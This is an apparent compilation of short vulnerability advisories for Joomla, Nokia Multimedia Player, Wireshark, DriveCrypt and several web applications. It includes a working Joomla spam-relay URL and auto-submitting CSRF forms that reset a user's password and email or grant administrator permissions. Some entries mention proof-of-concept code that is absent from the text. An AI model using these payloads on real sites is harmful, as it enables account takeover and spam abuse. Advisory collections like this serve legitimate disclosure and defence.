Joomla! 1.5.22 and 1.6.0 both allow spam email to be relayed to unsuspecting victims via the core com_mailto component. Tested using the following URL: http://localhost/j/index.php?option=com_mailto&tmpl=component&template=beez_20&link=aHR0cDovL2xvY2FsaG9zdC9qL2luZGV4LnBocD94PXkgSGFpIEkgYW0gYSBzcGFtIG1lc3NhZ2UhIFdvdWxkIHlvdSBsaWtlIHRvIGJ1eSBhbGwgc29ydHMgb2YgZmFrZSBzdHVmZj8gU1BBTSBTUEFNIFNQQU0= where the 'link' parameter is the base64-encoded string: http://localhost/j/index.php?x=y Hai I am a spam message! Would you like to buy all sorts of fake stuff? SPAM SPAM SPAM. The domain at the beginning of the decoded string is important, as it must match the domain being relayed against.
A buffer overflow vulnerability exists in Nokia Multimedia Player 1.00.55.5010 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to a stack-based buffer overflow in the application when handling a specially crafted .NPL file. An attacker can exploit this vulnerability by enticing a user to open a specially crafted .NPL file.
Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer. PoC code is provided in the text.
Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain types of packets. Attackers can exploit this issue to cause the application to enter an infinite loop, which may cause denial-of-service conditions.
This exploit targets a local privilege escalation vulnerability in DriveCrypt <= 5.3. It allows an attacker to gain SYSTEM privileges on the vulnerable system. The exploit works by switching the token of the current process with the token of the SYSTEM process. It is tested on DCR.sys and works on Windows XP and Windows 2003.
The vulnerability exists because the "modules/user/user.admin.php" script fails to properly verify the source of HTTP requests. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data. An attacker can use a browser to exploit this vulnerability. The following PoC is available: <form action="http://host/admin/index.php?module=user&task=save&elmid=" method="post" name="main"><input type="hidden" name="id" value="USERID"><input type="hidden" name="module" value="100"><input type="hidden" name="newpass1" value="newpass"><input type="hidden" name="newpass2" value="newpass"><input type="hidden" name="email" value="email@example.com"><input type="hidden" name="usertype_id" value="2"></form><script>document.main.submit();</script>
The vulnerability exists because the "http://host/admin/usersite/save2/" script fails to properly verify the source of HTTP requests and to properly sanitize user-supplied input. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data. An attacker can use a browser to exploit this vulnerability.
The vulnerability exists because the "admin/accounting.php" script fails to properly verify the source of HTTP requests. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data. An attacker can use a browser to exploit this vulnerability. The following PoC is available. Change user status: <form action="http://host/admin/customers.php?page=1&cID=USERID&action=statusconfirm" method="post" name="main"><input type="hidden" name="status" value="0"></form><script>document.main.submit();</script> Change user permissions: <form action="http://host/admin/accounting.php?cID=USERID&action=save" method="post" name="main" enctype="multipart/form-data"><input type="hidden" name="access[]" value="configuration"><input type="hidden" name="access[]" value="modules"><input type="hidden" name="access[]" value="customers"><input type="hidden" name="access[]" value="start"><input type="hidden" name="access[]" value="content_manager"><input type="hidden" name="access[]" value="categories"></form><script>document.main.submit();</script>
The vulnerability exists because the 'core/modules/shop/components/ProductList.class.php' script fails to properly sanitize user-supplied input in the 'product' variable. An attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. A second vulnerability exists in the 'core/modules/shop/components/Order.class.php' and 'core/modules/shop/components/ParamValuesEditor.class.php' scripts: it is possible to generate an error that will reveal the full path of the script. A remote user can determine the full path to the web root directory and other potentially sensitive information. A third vulnerability exists because the 'core/modules/user/components/UserEditor.class.php' script fails to properly verify the source of HTTP requests. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.